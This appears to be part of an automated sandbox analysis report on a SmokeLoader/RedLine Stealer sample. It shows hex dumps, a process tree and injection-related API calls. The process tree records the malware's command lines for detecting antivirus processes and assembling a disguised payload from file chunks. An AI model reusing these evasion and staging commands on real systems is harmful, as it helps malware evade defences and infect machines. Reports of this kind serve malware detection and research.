2024-07-15 04:11:14 UTC	16384	IN	Data Raw: 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72 00 69 00 62 00 75 00 74 00 65 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 2e 00 00 00 53 00 65 00 74 00 46 00 69 00 6c Data Ascii: a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttributes failed.SetFil
2024-07-15 04:11:14 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 0a 08 27 20 21 1a 87 33 37 29 e4 42 45 36 ff 50 52 3b ff 65 65 4a ff 67 69 68 ff 48 4e 88 ff 2a 45 b7 ff 08 1c ca ff 41 44 6c fa 0e 0e 01 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 04 03 10 17 19 13 65 2b 2e 23 c9 3b 3d 30 ff 47 4a 37 ff 59 5c 42 ff 61 64 5b ff 4d 58 96 Data Ascii: ' !37)BE6PR;eeJgihHN*EADl#e+.#;=0GJ7Y\Bad[MX
2024-07-15 04:11:14 UTC	16384	IN	Data Raw: 05 40 81 40 00 00 19 00 09 01 68 00 f8 03 00 00 53 00 79 00 73 00 4c 00 69 00 73 00 74 00 56 00 69 00 65 00 77 00 33 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 50 00 00 00 00 16 00 14 00 07 04 00 00 ff ff 82 00 ff ff 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 1c 00 3c 00 0e 00 03 04 00 00 ff ff 80 00 00 00 00 00 00 00 00 00 01 00 ff ff 00 00 00 00 00 00 00 00 c8 08 00 80 01 00 00 00 00 00 a2 00 16 00 00 00 00 00 00 00 08 00 00 00 00 01 4d 00 53 00 20 00 53 00 68 00 65 00 6c 00 6c 00 20 00 44 00 6c 00 67 00 00 00 00 00 00 00 00 00 00 00 01 00 02 50 07 00 07 00 94 00 08 00 06 04 00 00 ff ff 82 00 00 00 00 00 00 00 01 00 04 00 40 40 00 00 01 00 20 00 3f 20 00 00 02 00 30 30 00 00 01 00 20 00 68 26 00 00 01 00 20 20 00 00 01 Data Ascii: @@hSysListView32PgP<MS Shell DlgP@@ ? 00 h&
2024-07-15 04:11:14 UTC	16384	IN	Data Raw: bf 27 f6 3d 50 31 7c 90 97 ee cc fc 8e 41 47 c9 5c c5 30 9d ea e5 7c 8e 9d a1 7a a5 00 f9 dd dd 1d 6a 52 56 6a fa ec 83 7f 1e e2 56 5e d3 c3 28 bb f8 5f ef 8e fb 5c 38 9b 1f b6 1f 15 3b 8d 63 07 6f dc 81 4a 74 fc 5e 4f 91 8e 53 2b 68 ed 02 1e 77 32 b5 cc ce fc f3 03 4d 58 13 0e d5 3a ea 1d 53 af f3 2e 5b 1b c5 ee 70 f4 7c c1 71 1f 2f 28 51 26 33 7c 84 e2 3e 30 af d9 bf 16 93 11 d1 fb e4 d9 91 ca 7b 67 b6 3d ab 19 7f 6f c7 d0 4c 27 fe c9 45 44 e1 1c 52 41 14 bb b1 1c 5a 63 aa 9a a0 9b ae 5b aa d1 3f 6d 54 5d fd 7a 9d 34 04 5c 68 59 18 9f 15 d6 32 ff 44 18 6c 4f dc 73 32 c8 bb 2d f5 3f 82 c0 db 87 8b cf 3e f2 63 44 08 f7 b5 19 16 f8 a9 48 8b 67 78 d6 14 c0 e3 28 d9 99 5f 93 ac a4 96 3d 24 93 ba 2d ee 3e ba 32 2e d9 87 c9 58 60 18 58 68 7c 3d 39 86 09 ae 1a Data Ascii: '=P1\|AG\0\|zjRVjV^(_\8;coJt^OS+hw2MX:S.[p\|q/(Q&3\|>0{g=oL'EDRAZc[?mT]z4\hY2DlOs2-?>cDHgx(_=$->2.X`Xh\|=9
2024-07-15 04:11:14 UTC	16384	IN	Data Raw: d4 98 75 09 e4 0b 67 4f 72 0f 74 8b 71 b6 dc de b3 6d 6b 24 a2 f8 e2 90 d9 63 47 de b2 ad e4 43 10 d1 62 dd 4c b1 8f 76 0b 15 00 04 f5 63 c9 b7 a2 3a 23 b6 23 a6 3c c6 ea e1 92 95 60 30 cd 32 a5 88 b8 ca 44 2b d0 34 11 e7 10 5c dc 37 30 d3 25 06 b4 56 a3 aa 40 09 dd b2 cf aa e0 c4 92 e5 7c 88 75 72 c7 ee e7 a1 a4 18 c7 27 6b 04 09 41 93 ac a4 19 b4 89 29 fd f4 ba e5 27 26 9a 3c 28 00 68 6f 58 3c 04 fb 5f 6a c3 9f 4c 51 b9 e1 af fc a6 d8 cb 3b 92 0d 45 82 35 f4 8f 86 c8 a4 2e 56 91 60 49 b4 f0 7a 53 e8 23 da f1 a6 7a 10 39 ad b1 a1 70 7f f4 2d a4 a0 6e bb 30 28 25 e1 72 a4 e3 5e a0 a0 a1 9b d4 34 53 4d b0 8b bc 54 b0 63 be 1e c5 b1 ae b9 6c 64 ee d7 2b 3b 2e 13 80 d0 ca 29 dd 4b 45 11 78 26 81 d6 6c 37 b2 fd 07 51 a3 79 f4 b2 e7 f7 ad 99 56 f5 9d 59 fc e4 Data Ascii: ugOrtqmk$cGCbLvc:##<`02D+4\70%V@\|ur'kA)'&<(hoX<_jLQ;E5.V`IzS#z9p-n0(%r^4SMTcld+;.)KEx&l7QyVY
2024-07-15 04:11:14 UTC	16384	IN	Data Raw: 2a c6 49 17 71 5c 5b 53 30 ee a5 72 ff 6b d3 aa ef 8a 96 3f 6b 98 22 28 c3 57 e0 45 fb ca c6 1b e0 00 7f cf ca 03 f1 78 22 6a 9b 3e 03 f9 c2 fe 21 96 ef 2e e1 d8 dd 74 1d 52 cb 65 bc a5 69 36 93 9e f0 49 64 fe 8d 81 58 ce ce ae 43 47 5c 82 29 f0 61 16 66 3f f4 e8 37 83 e8 6f ec 17 3a da ea c9 0d 39 7b c1 d1 ac df 26 3f 94 cf e4 f1 ad 1a 53 69 1f 11 60 7a 3a 2c c8 2b 3e 72 c2 43 3a d0 2e 1e f5 ad 69 82 6c 41 c1 21 77 57 9f 8b 26 24 51 f9 15 3e 2f 54 65 f4 07 ce 00 ac 03 e9 bf 98 1e f3 87 6a 50 6b ac 99 4b 4c 3c 99 81 24 88 7e f7 a2 76 d0 1e f0 db 98 6a d0 74 46 d4 e8 26 5a 3e bd 92 58 6d 9c 60 fb d4 e7 b6 4b ca de 7f e9 de 03 13 58 e0 70 80 d2 75 20 48 1b ef 92 5d 01 f7 15 91 ed 6b a7 58 55 88 07 ff ee c5 36 4a c6 eb 0e 77 ae 90 63 a5 bf c5 2a 32 65 a0 65 Data Ascii: Iq\[S0rk?k"(WEx"j>!.tRei6IdXCG\)af?7o:9{&?Si`z:,+>rC:.ilA!wW&$Q>/TejPkKL<$~vjtF&Z>Xm`KXpu H]kXU6Jwc2ee
2024-07-15 04:11:14 UTC	16384	IN	Data Raw: d5 b0 00 d3 59 2e 43 3d 98 2d 95 e5 09 f9 2c 3d 3c c4 71 b8 72 55 b8 6b 12 42 bd 2d 17 aa d6 04 42 27 69 12 75 c7 be 4e 7d 72 06 e7 dd c2 62 70 06 9b 30 09 f1 b7 d9 85 26 ba f6 db f6 46 7e 05 a8 5a 88 37 37 48 d7 48 79 87 3f a9 07 3c 8d 82 16 aa dd fb 15 03 6f 93 9a 30 64 e1 17 10 37 fa b9 50 6a 96 2d 31 1e 3d 79 f1 92 87 dc f4 83 dc 41 f1 ce 46 3f 05 ee cd 81 63 99 29 36 9e 68 b5 f0 af 15 2c 10 38 24 6e 6c ad 15 40 6b 9f f9 18 6c c4 e7 80 fc 04 49 8e d4 71 a3 bc 5e 68 f1 87 fb a6 6d 97 64 54 7a d1 2a a8 17 6e 39 d3 1c 30 57 48 c5 86 fe 6f 3b 75 89 7c 91 ac f5 19 3b 92 f8 21 1c 9b 6f 01 18 de 8f 98 22 11 72 24 36 e5 25 7e 35 eb 5e 18 67 fa 84 e2 5b 93 30 61 6f f5 40 ed 98 20 36 4d dc 4d 43 46 73 f2 5c c1 71 58 7f 76 7e 74 4e f4 4b 1a db 17 29 26 53 25 68 Data Ascii: Y.C=-,=<qrUkB-B'iuN}rbp0&F~Z77HHy?<o0d7Pj-1=yAF?c)6h,8$nl@klIq^hmdTz*n90WHo;u\|;!o"r$6%~5^g[0ao@ 6MMCFs\qXv~tNK)&S%h
2024-07-15 04:11:14 UTC	16384	IN	Data Raw: 42 6d ca 92 38 a1 ac b8 19 e9 b8 97 5e 47 67 c7 62 91 e6 c2 93 86 58 50 5a 6a e2 be 45 24 23 d2 9a 3e d5 ad 69 ea f0 0b e1 e7 24 97 64 15 2e 64 30 fa 49 19 ed 64 d4 c1 8c 5e 4c 69 1c 99 af 72 d7 3f a9 6a 86 ad e7 8d 86 1b 27 19 40 0b 67 df 8a 33 27 63 5e a9 27 da 05 ea d5 cd 67 b3 8e 19 05 5e 3f 94 50 02 5f ce 43 29 9f 91 58 b0 b9 c7 2e 98 c8 09 6b 96 f1 00 7c 11 80 ae 2e 5b 20 23 3c 71 e2 35 6c 6a 7d 28 fa ea 33 5d c0 4a 9b 1e 44 73 a6 82 50 c8 b6 43 5e 5e d2 8f 3f 04 3c cc f2 b9 dd b9 76 86 d2 40 fe f8 8a 66 f0 86 e9 b8 82 9e dd d7 3b 8e b6 c9 c3 bd aa a4 ec 9b 39 c4 85 2d b5 36 0e a7 ab 82 80 85 22 5c e6 4c 7f c0 ed 2b a8 c8 b2 d0 98 70 5f 24 6a 12 9f a4 5c a8 2a e5 30 93 21 6f ee 28 b0 f2 82 54 ce 97 81 bc 50 38 6b 88 2b 60 46 50 3b 8b ad ab 9a 7f 69 Data Ascii: Bm8^GgbXPZjE$#>i$d.d0Id^Lir?j'@g3'c^'g^?P_C)X.k\|.[ #<q5lj}(3]JDsPC^^?<v@f;9-6"\L+p_$j\*0!o(TP8k+`FP;i

Target ID:	0
Start time:	00:10:03
Start date:	15/07/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	345'600 bytes
MD5 hash:	1AAE19C81605BF0A5851E42E3574A83C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:10:09
Start date:	15/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	00:10:28
Start date:	15/07/2024
Path:	C:\Users\user\AppData\Roaming\wjshsfa
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wjshsfa
Imagebase:	0x400000
File size:	345'600 bytes
MD5 hash:	1AAE19C81605BF0A5851E42E3574A83C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:11:15
Start date:	15/07/2024
Path:	C:\Users\user\AppData\Local\Temp\9CFE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9CFE.exe
Imagebase:	0x400000
File size:	2'074'333 bytes
MD5 hash:	C71D322F4A1D526CC0E5B3E010C184BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 11%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:11:19
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:11:20
Start date:	15/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:11:20
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xec0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:11:20
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0x40000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:11:21
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xec0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	00:11:21
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0x40000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:11:21
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 78801
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:11:22
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "rapidconfidentialityspokedrill" Thanks
Imagebase:	0x40000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:11:22
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\B
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:11:22
Start date:	15/07/2024
Path:	C:\Users\user\AppData\Local\Temp\78801\Later.pif
Wow64 process (32bit):	true
Commandline:	78801\Later.pif 78801\B
Imagebase:	0xbf0000
File size:	937'776 bytes
MD5 hash:	B06E67F9767E5023892D9698703AD098
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	00:11:22
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 5
Imagebase:	0x6b0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:13:00
Start date:	15/07/2024
Path:	C:\Users\user\AppData\Local\Temp\78801\Later.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\78801\Later.pif
Imagebase:	0xbf0000
File size:	937'776 bytes
MD5 hash:	B06E67F9767E5023892D9698703AD098
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	28.6%
Signature Coverage:	65.3%
Total number of Nodes:	98
Total number of Limit Nodes:	3

Executed Functions

Function 00401496 Relevance: 10.7, APIs: 7, Instructions: 247
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69

Function 00401538 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65

Function 004014DE Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24

Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64

Function 00401565 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64

Function 00401579 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
